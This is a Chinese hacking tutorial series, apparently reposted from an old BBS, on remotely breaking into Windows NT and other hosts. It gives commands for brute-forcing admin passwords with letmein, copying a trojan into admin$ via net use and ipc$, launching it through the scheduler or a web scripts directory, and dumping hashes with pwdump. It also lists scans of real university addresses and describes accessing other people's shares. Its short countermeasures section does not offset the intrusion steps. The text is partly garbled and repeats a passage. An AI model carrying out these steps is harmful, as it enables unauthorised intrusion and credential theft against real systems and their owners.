远程入侵NT.docx
《远程入侵NT.docx》由会员分享,可在线阅读,更多相关《远程入侵NT.docx(25页珍藏版)》请在冰豆网上搜索。
远程入侵NT
远程入侵NT----spp(低音炮)
看了篇文章介绍使用netbus或netspy 远程入侵nt系统,感觉真是。
。
看来nt系统的共享机制如果不配合火墙使用,SMB会给你造成很大麻烦。
。
连小小只的木马都可以让nt管理员头大。
其攻击过程如下:
1、使用扫描工具查找NT主机
2、确定攻击目标后,使用letmein对目标主机进行攻击,如:
letmeinfile:
//x.x.x.x/-all-gmypwd(对\\x.x.x.x上所有用户攻击)
letmeinfile:
//x.x.x.x/-admin-gmypwd(对\\x.x.x.x上管理员攻击)
letmeinfile:
//x.x.x.x/-all-dmypwd(显示\\x.x.x.x上所有用户)
注:
-确定目标后,收集目标信息并尝试取得非法资源
3、当letmein获取相关管理员权限后,使用ms提供的合法命令:
netuse\\x.x.x.x\ipc$"pass"/user:
"user"连接远程资源并将木马拷入远程
copyx:
\netserver.exe\\x.x.x.x\admin$\system32
4、使用合法ms命令远程启动木马服务:
netsvc\\x.x.x.xschedule/startat\\x.x.x.xhh:
mmnetserver.exe/port:
yourport/nomsg
该方法有其巧妙之处。
。
利用nt的任务计划管理,在特定时候启动木马服务
另一种方法:
将ntsrver.exe或其他运行程序Copy到目的服务器的www可执行目录,如cgi-bin或scripts,然后在浏览器键入url如:
http:
//x.x.x.x/scripts/ntsrver.exe/port:
yourport或http:
//x.x.x.x/cgi-gin/ntsrver.exe/port:
yourport木马服务将被启动
到此,该次攻击可以算成功了,远程资源已在别人控制下。
如果在远程使用appredirect启动一个cmd.exe到特定端口,那么你可以telnet到该端口,更方便使用该远程资源。
比如:
使用pwdump将远程nt上所有用户和密码dump成文件,回传本地,使用其他工具如l0phtcrack来运算。
分析该次攻击的整体过程,不难看出,关键步骤是letmein取得admin权限,但是很不幸,就目前厦门(有些是省内)的nt服务器管理员而言,密码对letmein只是多花几分钟而已。
我对某些大的公共平台服务器进行扫描的结果,除了solaris和linux系统之外,其余的nt被letmein猜中率有75%以上。
而且在这些被进入的机器上,SMB都有在tcp/ip上跑,有两台有配备火墙,但是没有封闭对外137-139口。
对策:
1、还是老话,密码的选择问题,使用向..@2KjsfiM7v!
09..这样的密码会让任何使用暴力法计算的机器算到cpu烧掉。
2、nt网络的适当配置,不要在对外的nc绑定共享服务是个好习惯,特别是tcp/ip协议。
3、防火墙的配置,屏蔽一切不需要的服务端口,象netebui在tcp/ip上的137-139口,开这些口只会使你的系统处于危险的处境,如果非要在远程使用这些口的服务,建议使用其他软件来代替。
4、及时检查日记和监控服务的运行,定时对文件系统的权限受托关系进行检查。
5、管理人员素质的提高,安全风险意思加强无疑对你管理的系统有很多好处。
--SPP10Hz的低频你听不到的声音却无时不刻在影响着你。
黑客技术
破解密码、Scanner、Windows和Nt、Sniffer、再议SnifferARP、欺骗技术
尽一年没来了,发现帐号还在,嘻嘻。
。
。
挺好。
看了这版的文章,觉得有些想法,好象大家对网上安全的问题看法差别很大,有些好象还觉得网上真的很安全,呵呵。
。
所以想有时间分几次谈谈自己的看法,不过想先举个例子,就学校的网络系统而言,用10秒的时间,你可以看到什么?
我看到的是这样的:
210.34.0.12=''
210.34.0.13=''
210.34.0.14=''
210.34.0.17=''
210.34.0.18='JingX'
210.34.0.55=''
210.34.0.1=''
210.34.0.2=''
210.34.0.15
210.34.0.65=''
210.34.0.66
ok.那么这些又代表什么呢?
看看bbs--210.34.0.13吧,再用10秒。
Port13found.Desc='daytime'
Port9found.Desc='discard'
Port19found.Desc='chargen'
Port21found.Desc='ftp'
^^^
可能有东东的。
请参考CERTcoordinationCenter关于这个东东的说明。
wuarchive.wustl.edu:
/packages/ftpd.wuarchive.shar
Port22found.
Port23found.Desc='telnet'
Port25found.Desc='smtp'
Port80found.Desc='www'
^^^^^^^^^^^^^^^^^^^
这是个bug.使用别的工具,你可以看到进程所有者。
呵呵。
。
你说是root吗?
Port110found.Desc='pop3'
Port111found.Desc='portmap/sunrpc'
Port37found.Desc='time'
Port7found.Desc='echo'
Port513found.Desc='login/who'
Port514found.Desc='shell/syslog'
Port540found.Desc='uucp'
Port970found.
Port971found.
Port972found.
Port976found.
Port977found.
提供的服务不少嘛,好了,现在对一个有经验的hacker(是hacker,不是cracker)来说,这台主机已经在你手上了,离root不远了,这里我只是举个例子。
并没有褒贬本bbs的意思。
还望见谅。
当然,这没什么。
相信很多人可以这样的。
所以,我想对网络的安全问题谈自己的一些看法,边整理边贴,贴到哪里算哪里。
可能会涉及到的有关参考资料,技术报告,白皮书等,我会尽可能列出网址。
对于提供的服务不少嘛,好了,现在对一个有经验的hacker(是hacker,不是cracker)来说,这台主机已经在你手上了,离root不远了,这里我只是举个例子。
并没有褒贬本bbs的意思。
还望见谅。
当然,这没什么。
相信很多人可以这样的。
所以,我想对网络的安全问题谈自己的一些看法,边整理边贴,贴到哪里算哪里。
某些用PostScript格式的说明文件,你可以到这些地方去下载。
能列出网址。
对于
ftp:
//
http:
//www.cs.wisc.edu/%7Eghost/gsview/index.html
相关的工具软件我也会列出下载站点,但是某些程序请你自己编译,并且不保证没有特络伊木马或其他恶意代码。
从CrackPassword说起吧。
黑客技术
(2)-破解密码
所有看法纯属个人见解,欢迎指正,有悖你想法的地方,请E_mail:
s_p_p@
密码破解:
网络很大一部分安全是靠密码保护的,但是密码可以被破解,所以还是有可能被人入侵系统的。
我想这是大部分人对破解密码的看法。
也就是,我可以用一些技巧来获得系统的口令文件,然后我用某个算法来计算加密的口令,然后,呵呵。
。
其实不然。
。
事实上,我的看法是被加密过的密码大部分是不可能被解码的。
加密算法的过程绝大多数是单向的。
所以,真正加密过的密码是不可能解出来的。
(Microsoft例外,呵呵。
。
)
大部分的破解程序只是使用和原来加密密码的同样算法,透过分析,试着找出对应的加密版本和原来的密码。
也就是通常cracker们说的“暴力”算法。
一个一个试。
呵呵。
。
试到你提供的字典文件中的某个单词刚刚好和那个傻瓜用户的密码一样,如果字典文件找完了,还没有一个一样的单词,呵呵,,我看什么东东都没有,白浪费时间而已,所以,很多的高手通常的字典文件都100M左右,不奇怪的。
可见,“大多数人认为只要他们的密码没有在usr/dict/words中,就安全了,所以不关心帐号的安全。
。
”(DanielV.Klein的"Asurveyofimplementsto,PasswordSecurity")所以,提供注册密码或CD-Keys不是破解密码,而在网上提供这些东东的行为和海盗没什么差别。
你可以到alt.cracks这个新闻组里看看这些海盗们。
真正的破解密码程序看起来向这样:
Microsort很关心是不是有人偷了他的windows。
所以Microsoft搞了一个CD-keys的保护程序。
相信大家都知道是怎么一回事,有个人呢,看不下去,所以就写了一个程序,经过
1。
将所有明显的和跟键值无关的拿掉。
2。
将剩下的数全部相加。
3。
结果除7。
如果你没得到小数,你拿到了一个有效的CD-Keys。
设计这个软件的人叫DonaldMoore,你可以在
得到整个详细说明和分析。
在:
得到完整源代码。
还有的呢?
我想大多数人对UNix平台的密码很感兴趣。
在Unix上,所有使用者的id和密码都放在一个集中的地方,/etc/passwd(shadow).因此我们关心的就是这个地方舒服吗?
事实上从DES(美国国家标准局和国家安全总署联合背书的)的加密程序Crypt(3)来看,想要破解是有这样一种可能的(1/70,000,000,000,000,000)几率。
(详细的DES,crypt资料从:
ftp:
//
但是,如果你拿到passwd,取出密码段喂给某个程序,加密后和原来的做比较,如果一样,90%你拿到口令了。
就是这么简单。
网络其实就这么安全。
如何拿到passwd超出本版的范围,也不在我知识掌握之中,但是,你可以从
http:
//sdg.ncsa.uiuc.edu/~mag/Misc/wordlists.html下载几个字典文件研究一下。
从:
从:
看看他们对你的系统有没有威胁。
其他的密码破解采用相近的方法。
有兴趣的话,你可以找一个zipCrack10或
FastZip2.0玩玩。
WordPerfect可以找Decrypt.
excel的用excrack
windows的Pwl文件。
。
呵呵。
。
用Glide.
http:
//www.iaehv.nl/users/rvdpeet/unrelate/glide.zip
Novell的用netcrack.
Nt的用passwordNT
.........
我想我是无法列尽这些东东的,不过可以说的是,没有什么软件能提供给你真正的安全保护。
特别是当你上线的时候。
。
。
感觉好象乱乱写。
。
呵呵。
。
太多的关于密码的东东了,我只是想说,不管你用什么系统,在Crack眼中,没有什么安全性可言。
明天再整理如何在网络中收集你想要的有关对方主机信息。
谈谈host,traceroute,rusers,finger如何将你的主机信息告诉别人。
并且告诉到什么程度。
呵呵。
。
黑客技术(3)-Scanner
网络安全上,最有名的我想莫过于Scanner了。
。
它是一个可以自动侦察系统安全的程序,大部分情况下,用来找出系统的安全弱点。
通过对Tcp的ports和服务的侦察,然后将信息记录下来,提供目标的安全分析报告,这是标准的scanner,象unix上的某些服务,如:
host,rusers,finger等,只是半个scanner.完全发挥Scanner的功能要求使用者必须掌握相应的tcp,C,Perl,Socket的基本常识。
关于socket可以从:
http:
//147.17.36.24/prog/sockets.html得到详细的设计说明。
那么Scanner到底会告诉你什么呢?
其实他真的不告诉你什么,呵呵。
。
他只是将信息完整的记录下来,做为一个系统管理员,会看出内在的弱点才是要命的,因此,我不知道你通常是怎么做的,我是到这些地方去看信息的。
firewalls@
sneakers@cs.yale.edu
www-security@ns2.rutgers.edu
ntsecurity@iis
bugtraq@netspace.org
多了解这些信息对看出由scanner记录的东东很由好处。
比如:
fingerroot@后我得到这样得信息:
loginname:
rootinreallife:
0000-Adim(0000)
^^^^^^^^^^^^^^^
Directory:
/shell:
/sbin/sh
LastlogintueFeb181904:
05:
581997;
UnreadsinceWebFeb.........
NoPlan.
现在我起码知道这台主机上跑Solaris.再用ftp或telnet我可以知道Solaris
的版本号,然后我可以知道那个版本的有什么Bugs,分别是哪一级的,我如何做。
。
。
。
可见,Scanner能找到网络上的机器,找出机器的信息,提供某些人分析。
一个典型的例子:
1995年,SGI卖出许多“WebForce”的机器,机器很不错,多媒体功能很强,跑的是IRIX,不幸的是,有个系统的内置帐号“lp”不需要密码。
(本市有这样的机器)好了,现在我想看看究竟是哪一台,他的硬盘有些什么,我这样做:
1。
我找到一个搜索引擎,查找“EZSetup+root:
lp:
”(老土的方法)
或者,我用scanner.使用scanner的telnet对202.XXX.XXX.000到202.XXX.XXX.255
全部进行telnet.传回的信息象这样:
Trying202.XXX.XXX.XXX
Connectedto........
EscapeCharacteris"]"
IRIX4.1
Welcome.........
Login:
2。
我马上离开了。
。
呵呵。
。
。
。
想了解最后一个使用这个bug的人的ip地址,fingerlp@the.sgi.box这小子很牛。
修改你的passwd使其中一行这样:
lp:
*:
4:
7:
lp:
/var/spool/lpd:
你的问题解决了。
在unix中,host执行nslookup一样的功能。
但是,host是unix中最危险,最有
威胁性的十大工具之一,(我认为)比如:
我host某个大学。
host-l-v-tany
呵呵。
。
你会看到:
Found1addressesforXXX.XXX
Found5addressesforXXX.YYY
..
..
Trying210.XXX.XXX.XXX
XXX.XXX86400INSOA
961112121
900
900
604800
86400
....
XXX.YYY86400INHINFOSUN-SPARCSTATION-10/41UNIX
XXX.ZZZ86400INHINFODEC-ALPHA-3000/300LXOSF1
....
XXX86400INHINFOPC-PENTIUMDOS/WINDOWS
....
一个将近120K的文件。
好了,现在我知道跑dec的机器可能有mount-d-s的毛病。
跑sun的机器可能有patch-ID#100376-01的问题。
跑windows95的机器可能有SMB协议,我可以用SAMBA来连上共享目录。
Rraceroute同样也是unix中的犀利工具,用来确定主机到底在什么地方。
具体功能我不说了,他和rusers,finger一样,提供一些看起来好象没什么的资料,但是,你可以利用某些技巧来定位一个目标。
还有一个命令shownount.他的-e参数可以提供某些目录的bug出来。
类似的工具你可以参考这些:
netscan
NetWorkToolbox
Tcp/IpSurveyorftp:
//wuarchive.wustl.edu/systems/ibmpc/win95/netutil/wssrv32nz
ip
真正的Scanner:
NSShttp:
//www.giga.or.at/pub/hacker/unix/
Strobehttp:
//sunsite.kth.se/linux/system/network/admin/
SATAN
IdentTCPscanhttp:
//www.giga.or.at/pub/hacker/unix/(这是我强力推荐的)
Connecthttp:
//ww.giga.or.at/pub/hacker/unix/
SafeSuite(强力推荐的软件,由ISS发展小组开发)
Safesuite提供3个scanner,
Intranetscanner,Webscanner,firewallscanner.
提供6个攻击测试:
sendmail,ftp,nntp,telnet,prc,nfs
如果你的主机通过了这个软件,呵呵。
。
不要命的hacker可能会和你拼了。
使用这个软件,我很轻易的就发现了学校一台主机的三个致命弱点。
rlogin,ftp,httpd。
每个都够你使用root权限。
如何使用和到哪里去下载这个软件我不太清楚,你可以到网上去找。
总之,我相信任何的系统都存在安全上的风险,对于想真正了解网络安全的系统管理员,都应该从很细小的资料上注意起。
并且应该时刻注意你所用的系统有没有新的不安全因素出现在网上。
还想谈的安全问题还有sniffer,trojans,fakeip,emailbomb,systembugs,
microsoft(oob139,1031,80),someunixproblem.(telnet,nfs..),hacker&cracker.
这些都是我长期收集的资料和实际操作中碰到的。
所以只能是整理到哪里贴到哪里。
当然,这些只是我的个人看法,能谈到什么程度我不敢说,但是我希望能对关心网络安全问题的人提供一些帮助。
也希望大家一起来真正了解我们面对的机器能保存些什么秘密。
黑客技术(4)-Windows和Nt
Microsoft的安全问题一直是一个很敏感的问题,因为网络上有太多的使用者了,在我收集的长达79页的Microsoft技术规范说明中,谈到安全问题的仅仅是一段“比以往的版本,在安全技术上有很大的改善”,显然,Microsoft更关心的是有没有人偷他的软件去使用,而不是用户在使用软件时是否安全。
那么,摆在眼前的就是:
Microsoft从来就不是一个安全的平台,即使是Nt系统,虽然Nt经过了NSA的安全等级C2鉴定。
但是,请注意以下的补充说明:
1·C2在EPL中是很低的等级。
2·NT的C2只在某些硬件上才能达到,(CompaqPoliant2000,DECpcAXP/150Alpha)
3·NT的C2认证是假定在没有网络的情况下。
所以,在Microsoft的Windows产品中,基本的安全功能就相当的缺乏,所有密码的功能基本是依赖一个PWL的文件,所以,了解这份文件,你也就了解了Windows的所谓的安全机制。
在Windows中,使用两个函数来计算密码:
WnetCachePassword()
WnetGetGachedPassword()
如果你是一个软件设计人员,那么你可以使用相同的这两个函数来获得使用者的密码。
但是,更简单的方法是,你可以在Windows系统目录下,直接删除PWL文件,然后再以你的口令生成一个文件。
详细的说明你可以参考:
http:
//199.44.114.223/rharri/tips.htm
或者你可以到http:
//www.iaehv.nl/users/rvdpeet/unrelate/glide.zip下载这个软件,
然后试试在你的机器上运行。
如何解决上述问题,你可以使用Fortres101,在
上面说的只是单机的情况,那么,如果你的机器在网络上呢?
这里有我一份在去年3月份的记录。
对在记录中出现的任何机器,我很抱歉将你们列出来。
但是我保证没有动改你们的硬盘。
呵呵。
。
。
。
1997.3.27xx:
xx:
xx
我从internet连线上学校的网络,当时,我用了一个Scanner来扫描整个的网络,
令人惊奇的是,我从结果窗口中看到了这样的一些信息:
Win95client:
littlesun
Win95client:
tina&ryu
.....
.....
Win95client:
subtle
.....
WinNtServer:
XXXXXXDomain:
XXXXX_XX
.....
Ok,接下来,我只是用网络邻居来打开某台机器,然后,我立刻就发现了一些的共享目录。
其中的某些目录你可以用"guest"来连上,到了这一步,如果你是一个别有用心的人,你会怎么做?
我想象的做法应该是:
1.到95的系统目录下,下载所有的PWL文件。
(其中就有Adminis